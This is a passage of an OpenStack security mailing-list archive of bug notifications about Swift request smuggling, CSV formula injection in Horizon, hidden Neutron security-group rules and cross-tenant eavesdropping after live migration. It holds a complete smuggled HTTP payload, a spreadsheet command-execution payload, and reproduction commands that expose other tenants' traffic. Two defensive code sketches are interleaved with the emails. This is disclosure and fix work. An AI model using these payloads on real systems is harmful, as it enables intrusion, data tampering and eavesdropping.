1100', lines.pop().strip()) self.assertTrue('deletes: 2', lines.pop().strip()) self.assertTrue('puts: 3', lines.pop().strip()) self.assertTrue('1', jobs_to_delete[0]['partition']) in which assertEqual should be used. Change-Id: Ide5af2ae68fae0e5d6eb5c233a24388bb9942144 commit 03512e001d95adadfea147e8a4051fce0aa9dfca Author: pengyuesheng Date: Wed Jul 3 15:06:31 2019 +0800 Update the constraints url For more detail, see http://lists.openstack.org/pipermail/openstack-discuss/2019-May/006478.html Change-Id: I95114c4aa670c07491d5a15db2341f65cb0d1344 commit 5270da86e6eead273f58a24cba65b951550e3037 Author: pengyuesheng Date: Tue Jul 2 10:59:28 2019 +0800 Add python3 to setup.cfg Change-Id: I5dd57aad794c050c44e328c43346be0063170492 commit 4aa71aa25caed34f36fafe2de025425aa1d1e0b2 Author: Kota Tsuyuzaki Date: Tue Oct 9 16:42:18 2018 -0700 We don't have to keep the retrieved token anymore Since the change in s3_token_middleware to retrieve the auth info from keystone directly, now, we don't need to have any tokens provided by keystone in the request header as X-Auth-Token. Note that this makes the pipeline ordering change documented in the related changes mandatory, even when working with a v2 Keystone server. 
Change-Id: I7c251a758dfc1fedb3fb61e351de305b431afa79 Related-Change: I21e38884a2aefbb94b76c76deccd815f01db7362 Related-Change: Ic9af387b9192f285f0f486e7171eefb23968007e commit eed76d8bed446518bff2ca4af18259f7637c430e Author: arzhna Date: Wed Nov 28 11:15:05 2018 +0900 Fix a potential bug In the class method from_hash_dir(), the arguments to input when creating an instance of the BaseDiskFile class are incorrect. The __init__() method of BaseDiskFile class receive the arguments in order of mgr, device_path, partition and etc. However, in from_hash_dir() method, the order of arguments are mgr, device_path, None and partition The class method from_hash_dir() is used by the Object Auditor. If the partition argument is used in the new DiskFile implementations, exception may occur. It will be cause object auditing to failed and the object will be quarantine by the Object Auditor. Closes-Bug: #1805539 Change-Id: Ic2e29474505426dea77e178bf94d891f150d851b ** Tags added: in-feature-losf ** Bug watch added: Python Roundup #33973 http://bugs.python.org/issue33973 ** Bug watch added: Python Roundup #30458 http://bugs.python.org/issue30458 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. 
The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From fungi at yuggoth.org Sat Oct 12 13:11:52 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Sat, 12 Oct 2019 13:11:52 -0000 Subject: [Openstack-security] [Bug 1842749] Re: CSV Injection Possible in Compute Usage History References: <156762575246.17155.15736064918343185075.malonedeb@gac.canonical.com> Message-ID: <157088591251.16308.15348820496788448299.malone@soybean.canonical.com> Thanks for the feedback everyone. We'll classify it as a security hardening opportunity in that case, no advisory needed. 
** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842749 Title: CSV Injection Possible in Compute Usage History Status in OpenStack Dashboard (Horizon): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Many spreadsheet programs, such as Excel, LibreOffice, and OpenOffice, will parse and treat cells with special metacharacters as formulas. These programs can open comma-separated values (CSV) files and treat them as spreadsheets. If an attacker can influence the contents of CSV file, then that can allow the attacker to inject code that will execute when someone opens the CSV file through a spreadsheet program. In the Compute Overview panel in Horizon, there is a section titled “Usage Summary.” This section has a feature for downloading a CSV document of that usage summary. The contents of the CSV document include the name of the instances and other points of data such as its current state or how many resources it consumes. An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Reproduction Steps: 1. Access an OpenStack project, navigate to the Instances section. 2. Create an instance with the following name: =cmd|' /C calc'!A0 3. Navigate to the Overview section. 4. Refresh the page until the new instance shows up in the Usage list. 5. Click the button titled “DOWNLOAD CSV SUMMARY.” 6. Observe the generated CSV file. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842749/+subscriptions From 1842749 at bugs.launchpad.net Tue Oct 15 11:46:14 2019 From: 1842749 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 11:46:14 -0000 Subject: [Openstack-security] [Bug 1842749] Re: CSV Injection Possible in Compute Usage History References: <156762575246.17155.15736064918343185075.malonedeb@gac.canonical.com> Message-ID: <157113997481.6588.11984873707371784222.malone@gac.canonical.com> Reviewed: https://review.opendev.org/679161 Committed: https://git.openstack.org/cgit/openstack/horizon/commit/?id=70629916fe32df61018fd122711e6b036b53c811 Submitter: Zuul Branch: master commit 70629916fe32df61018fd122711e6b036b53c811 Author: Adam Harwell Date: Wed Aug 28 16:59:06 2019 -0700 Use quoting for CSV Writing An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Quote the CSV output so this is no longer a possibility. 
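For readers who want to see what the quoting defence looks like in code, here is a minimal sketch. It is not the Horizon patch itself: the merged change, as the message above says, relies on CSV quoting, while the leading-character escape shown here is an additional hardening step commonly recommended against spreadsheet formula injection. Function and variable names are illustrative only.

    import csv
    import io

    FORMULA_PREFIXES = ('=', '+', '-', '@')

    def sanitize_cell(value):
        # Prefixing a leading formula character with a single quote makes
        # Excel/LibreOffice treat the cell as text instead of a formula.
        text = str(value)
        if text.startswith(FORMULA_PREFIXES):
            text = "'" + text
        return text

    def write_usage_csv(rows):
        buf = io.StringIO()
        # QUOTE_ALL mirrors the "quote the CSV output" approach of the fix.
        writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
        for row in rows:
            writer.writerow([sanitize_cell(cell) for cell in row])
        return buf.getvalue()

    print(write_usage_csv([['Instance Name', 'vCPUs'],
                           ["=cmd|' /C calc'!A0", 1]]))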
Closes-Bug: #1842749 Change-Id: I937fa2a14bb483d87f057b3e8be219ecdc9363eb ** Changed in: horizon Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842749 Title: CSV Injection Possible in Compute Usage History Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Many spreadsheet programs, such as Excel, LibreOffice, and OpenOffice, will parse and treat cells with special metacharacters as formulas. These programs can open comma-separated values (CSV) files and treat them as spreadsheets. If an attacker can influence the contents of CSV file, then that can allow the attacker to inject code that will execute when someone opens the CSV file through a spreadsheet program. In the Compute Overview panel in Horizon, there is a section titled “Usage Summary.” This section has a feature for downloading a CSV document of that usage summary. The contents of the CSV document include the name of the instances and other points of data such as its current state or how many resources it consumes. An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Reproduction Steps: 1. Access an OpenStack project, navigate to the Instances section. 2. Create an instance with the following name: =cmd|' /C calc'!A0 3. Navigate to the Overview section. 4. Refresh the page until the new instance shows up in the Usage list. 5. Click the button titled “DOWNLOAD CSV SUMMARY.” 6. Observe the generated CSV file. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842749/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 13:56:22 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 13:56:22 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/train) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114778301.9967.10897679269980648188.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/train Review: https://review.opendev.org/688715 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 13:56:45 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 13:56:45 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/stein) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114780559.5856.16922422978472638791.malone@gac.canonical.com> Fix proposed to branch: stable/stein Review: https://review.opendev.org/688716 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 14:05:19 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 14:05:19 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/rocky) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114831947.10537.1321509755465082836.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/688717 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 14:11:17 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 14:11:17 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/queens) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114867720.10335.3339891317435727657.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/queens Review: https://review.opendev.org/688719 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
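Independent of which Horizon code path is involved, an affected user can cross-check the dashboard against the Neutron API directly by listing every rule attached to the group. A rough sketch using the documented security-group-rules list filter; the endpoint, token and group ID below are placeholders rather than values from this report:

    import requests

    NEUTRON = 'http://controller:9696'         # assumed endpoint
    TOKEN = '<keystone token>'                 # placeholder
    SG_ID = '<security group uuid>'            # placeholder

    resp = requests.get(
        NEUTRON + '/v2.0/security-group-rules',
        params={'security_group_id': SG_ID},
        headers={'X-Auth-Token': TOKEN},
    )
    resp.raise_for_status()

    for rule in resp.json()['security_group_rules']:
        print(rule['direction'], rule['protocol'],
              rule['port_range_min'], rule['port_range_max'])

Any rule returned here but missing from the Manage Rules page points at the filtering problem. The pdb traces that follow show where the two Horizon code paths diverge.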
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From obondarev at mirantis.com Fri Oct 18 12:43:59 2019 From: obondarev at mirantis.com (Oleg Bondarev) Date: Fri, 18 Oct 2019 12:43:59 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157140263950.18968.8867046367233779350.malone@gac.canonical.com> Should this bug be reopened for os-vif now when revert https://review.opendev.org/#/c/631829 was merged? @sean-k-mooney can you please share that status of this bug? Is there anything except neutron https://review.opendev.org/#/c/640258 and nova https://review.opendev.org/#/c/602432/ changes pending? -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. 
Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. 
Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 